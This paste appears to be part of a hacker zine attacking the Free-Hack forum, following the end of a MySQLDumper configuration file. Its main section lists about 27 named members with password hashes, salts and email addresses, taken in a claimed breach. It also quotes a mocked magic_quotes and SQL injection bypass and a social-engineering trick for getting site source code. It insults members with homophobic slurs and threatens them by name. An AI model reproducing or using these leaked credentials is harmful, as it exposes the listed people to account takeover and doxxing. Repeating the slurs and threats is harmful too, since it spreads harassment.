  4704. $config['interface_server_caption']=1;
  4705. $config['interface_server_captioncolor']='#ff9966';
  4706. //Position of the Serveradress 0=left, 1=right
  4707. $config['interface_server_caption_position']=0;
  4708.  
  4709. //Height of the SQL-Box in Mini-SQL in pixel
  4710. $config['interface_sqlboxsize']=70;
  4711. $config['interface_table_compact']=0;
  4712.  
  4713. // Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
  4714. $config['memory_limit']=100000;
  4715.  
  4716. // For gz-Compression set to 1, without compression set to 0
  4717. $config['compression']=1;
  4718.  
  4719. //Refreshtime for MySQL processlist in msec, use any value >1000
  4720. $config['processlist_refresh']=3000;
  4721.  
  4722. $config['empty_db_before_restore']=0;
  4723. $config['optimize_tables_beforedump']=1;
  4724. $config['stop_with_error']=1;
  4725.  
  4726. // For sending a mail after backup set send_mail to 1, otherless set to 0
  4727. $config['send_mail']=0;
  4728. // Attach the backup 0=no  1=yes
  4729. $config['send_mail_dump']=0;
  4730. // set the recieve adress for the mail
  4731. $config['email_recipient']='';
  4732. $config['email_recipient_cc']='';
  4733. // set the sender adress (the script)
  4734. $config['email_sender']='';
  4735.  
  4736. //max. Size of Email-Attach, here 3 MB
  4737. $config['email_maxsize1']=3;
  4738. $config['email_maxsize2']=2;
  4739.  
  4740. // FTP Server Configuration for Transfer
  4741. $config['ftp_transfer'][0]=0;
  4742. $config['ftp_timeout'][0]=30;
  4743. $config['ftp_useSSL'][0]=0;
  4744. $config['ftp_mode'][0]=0;
  4745. $config['ftp_server'][0]=''; // Adress of FTP-Server
  4746. $config['ftp_port'][0]='21'; // Port
  4747. $config['ftp_user'][0]=''; // Username
  4748. $config['ftp_pass'][0]=''; // Password
  4749. $config['ftp_dir'][0]=''; // Upload-Directory
  4750.  
  4751. $config['ftp_transfer'][1]=0;
  4752. $config['ftp_timeout'][1]=30;
  4753. $config['ftp_useSSL'][1]=0;
  4754. $config['ftp_mode'][1]=0;
  4755. $config['ftp_server'][1]='';
  4756. $config['ftp_port'][1]='21';
  4757. $config['ftp_user'][1]='';
  4758. $config['ftp_pass'][1]='';
  4759. $config['ftp_dir'][1]='';
  4760.  
  4761. $config['ftp_transfer'][2]=0;
  4762. $config['ftp_timeout'][2]=30;
  4763. $config['ftp_useSSL'][2]=0;
  4764. $config['ftp_mode'][2]=0;
  4765. $config['ftp_server'][2]='';
  4766. $config['ftp_port'][2]='21';
  4767. $config['ftp_user'][2]='';
  4768. $config['ftp_pass'][2]='';
  4769. $config['ftp_dir'][2]='';
  4770.  
  4771. //Multipart 0=off 1=on
  4772. $config['multi_part']=0;
  4773. $config['multipartgroesse1']=1;
  4774. $config['multipartgroesse2']=2;
  4775. $config['multipart_groesse']=0;
  4776.  
  4777. //Auto-Delete 0=off 1=on
  4778. $config['auto_delete']=0;
  4779. $config['max_backup_files']=3;
  4780.  
  4781. //configuration file
  4782. $config['cron_configurationfile']='mysqldumper.conf.php';
  4783. //path to perl, for windows use e.g. C:perlbinperl.exe
  4784. $config['cron_perlpath']='/usr/bin/perl';
  4785. //mailer use sendmail(1) or SMTP(0)
  4786. $config['cron_use_sendmail']=1;
  4787. //path to sendmail
  4788. $sendmail_path=ini_get('sendmail_path');
  4789. $config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';
  4790.  
  4791. //adress of smtp-server
  4792. $config['cron_smtp']='localhost';
  4793. //smtp-port
  4794. $config['cron_smtp_port']=25;
  4795. $config['cron_extender']=0;
  4796. $config['cron_compression']=1;
  4797. $config['cron_printout']=1;
  4798. $config['cron_completelog']=1;
  4799. $config['cron_comment']='';
  4800. $config['multi_dump']=0;
  4801. $config['logcompression']=1;
  4802. $config['log_maxsize1']=1;
  4803. $config['log_maxsize2']=2;
  4804. $config['log_maxsize']=1048576;
  4805.  
  4806.  
  4807.                ________________________                    
  4808.               |                        |_____    __          
  4809.               | FREE-HACK LIST OF LAME |     |__|  |_________
  4810.               |________________________|     |::|  |        /
  4811.  /\**/\       |                        \.____|::|__|      <  
  4812. ( o_o  )_     |                              \::/  \._______\
  4813.  (u--u   \_)  |                                        
  4814.   (||___   )==\                                        
  4815. ,dP"/b/=( /P"/b\                                        
  4816. |8 || 8\=== || 8                                        
  4817. `b,  ,P  `b,  ,P                                        
  4818.   """`     """`    
  4819.  
  4820. AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de
  4821. fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com
  4822. N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com
  4823. 100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de
  4824. Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com
  4825. noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de
  4826. Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru
  4827. sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de
  4828. Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com
  4829. Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de
  4830. inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de
  4831. H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de
  4832. meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net
  4833. J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com
  4834. #b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de
  4835. enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru
  4836. Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com
  4837. Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com
  4838. PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de
  4839. GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de
  4840. GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com
  4841. Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com
  4842. DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com
  4843. Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru
  4844. novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net
  4845. ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net
  4846. krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com
  4847.  
  4848. We think that novaca!ne's  magic_quotes bypass is quite representative
  4849. for this group:                                                        
  4850.  
  4851. --snip snip--
  4852.  
  4853. Bypass magic_quotes (novaca!ne)
  4854. magic_quotes is a php setting (php.ini).
  4855. It causes that every ' (single-quote), " (double quote) and  \ (backslash)
  4856. are escaped with a backslash automatically, a weak but wellknown securing method.
  4857. This is how to bypass it:
  4858. Use the funktion called ?String.fromCharCode()?, you need to translate your MySQL command
  4859. into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.
  4860. ? OR ?a? = ?a equals
  4861. String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)
  4862.  
  4863. --snip snip--
  4864.  
  4865. novaca!ne is (next  to fred777) of course, our new security superhero!
  4866. Congratz, faggot...                                                  
  4867.                                                                      
  4868. Finally we shouldn't forget our old fag superhero fred777, who  helped
  4869. us to understand how we could get every source code of  a  page.  This
  4870. sounds pretty hard, but fred777 shows his priv8  techniques  (we  fear
  4871. them):                                                                
  4872.  
  4873. --snip snip--
  4874. #########################################################
  4875. #     Sourcecode disclosure by social engineering        
  4876. #                   tested on NPD                        
  4877. #########################################################
  4878.  
  4879. Intro:
  4880. Ich schildere hier mal einen Fall, welchen ich letztens
  4881. noch vor mir hatte. Ich war durch Zufall mal wieder auf den
  4882. vielen NPD Seiten, um nach Lücken zu suchen.
  4883. Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte
  4884. es den Anschein, als ob sich da eine SQL Injection befände.
  4885.  
  4886. Sobald nämlich der Limitparameter falsch übergeben wurde, kam der
  4887. übliche SQL Error:
  4888.  
  4889. ---------------------------------------------------------
  4890.  
  4891. Rein logisch sah der Query so aus:
  4892.  
  4893. SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;
  4894.  
  4895. Als ich dann mittels eines Scripts versuchte den Query mit UNION
  4896. zu erweitern, wollte es aber nicht funktionieren.
  4897. Klar dafür konnte es so einige Gründe geben, allerdings hätte
  4898. ich mir zu gerne den Source + Abfragen angeschaut.
  4899.  
  4900. ---------------------------------------------------------
  4901.  
  4902. Wieso eigentlich nicht?
  4903.  
  4904. Nach einigen Überlegungen, schrieb ich dann eine Mail an den
  4905. Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt.
  4906.  
  4907. --snip snip--
  4908.  
  4909. What we learned is:                                                  
  4910. - If we write an email to an admin we always get the source code      
  4911. - fred777 uses tools to exploit some sql injection                    
  4912.                                                                      
  4913. "o_O", one of the banned users puts it nicely: "being lame is  one  of
  4914. fred777's master skills" Just to inform you: We owned  Free-Hack  with
  4915. this technique of course.                                            
  4916.                                                                      
  4917. TIME FOR SOME                                                        
  4918. ______________________________________________________________________
  4919. IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI
  4920. Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI
  4921. Ip|     __|  |.---.-.-----.|   _   |  |_|  |_.---.-.----.|  |--.|  |aI
  4922. Ia|__     |  ||  _  |  _  ||       |   _|   _|  _  |  __||    < |__|lI
  4923. Il|_______|__||___._|   __||___|___|____|____|___._|____||__|__||__|sI
  4924. Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI
  4925. IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI
  4926.                                                                      
  4927. Right, who deserves it? Correct! Suicide and  enco  for  being  badass
  4928. super high skilled computer professionals    ...    NOT              
  4929.                                                                      
  4930. This is a warning Free-Hack. Continue existing and  we  will  show  no
  4931. mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.    
  4932.  
  4933. ,_._._._._._._._|____________________________________________________
  4934. |_|_|_|_|_|_|_|_|___________________________________________________/
  4935.  ~ last words ~ !                                                    
  4936.                                                                      
  4937. That's all for now. We hope that those we have  owned  understood  the
  4938. warning and that those who already enjoyed issue  one  were  satisfied
  4939. with this release. We will take a little  break  for  now  and  go  to
  4940. Hawaii to get our asses drunk. But do not fear. There will  always  be
  4941. enough time for us to audit more code, write more 0day  and  own  more
  4942. idiots. We will always watch the scene and act if we are needed. There
  4943. is sill a lot to do and the winter of hax  is  not  over  yet.  So  do
  4944. expect us.                                                            
  4945.                                                                      
  4946.                                 |\                                    
  4947.                                /()/                                  
  4948.                                 \|                  - the happy ninjas
  4949.  ____________________________________________________|_._._._._._._._,
  4950.  \___________________________________________________|_|_|_|_|_|_|_|_|
  4951.                                                      !   ~ OUTRO ~    
  4952.               ,                                                      
  4953.     .         |                                                      
  4954.                     /                                                
  4955.       \       I                                                      
  4956.                   /                                                  
  4957.         \  .g88R_                                                    
  4958.           d888(`  ).                   _                              
  4959.  -  --==, 888(     ),=--           .+(`  )`.                          
  4960. )         Y8P(       '`,          :(   .    )                        
  4961.         .+(`(      ,   )     .--  `.  (    ) )                        
  4962.        ((    (..__,:'-'   .=(   )   ` _`  ) )                        
  4963. `.     `(       ) )       (   ,  )     (   )  ._                      
  4964.   )      ` __.:'   )     (   (   ))     `-',:ccee88oo,                
  4965. )  )  ( )       --'       `- __,'        ccC8O8O8Q8PoOb.o8oo          
  4966. .-'  (_,'          ,')                 pqdOB69QOFFE4OpugoO9bD        
  4967.                  .(_  )              CgggbbU8OU qOp qOdoUOdcb,        
  4968.                      . ,                 .3X4X5U2M/p u gcoUodpP      
  4969.                                               .\\\//  /douUP          
  4970. And shepherds we shall be, for thee my Lord for \\\////.       (´`)  
  4971. thee,  power hath descended forth from thy hand, |||||.     ,.(´ -.),.
  4972. that our feet may swiftly carry out thy command. |||/\,     (  ,   ,)
  4973. We shall flow a river forth to thee, and teeming |||\/.      `-´`´`´.
  4974. with souls  shall it  ever be. In nomine patris, |||||.              
  4975. et filii, et spiritus sancti   ,..,,.,.,....,,,,//||||\...,,,,        
  4976. ,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,.    
  4977. .,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,.
  4978.  
© All Rights reserved. NoPaste.me - We have 18108 Pastes at this time - Imprint - twitter Follow us! - Login
Hosted by MyHost.to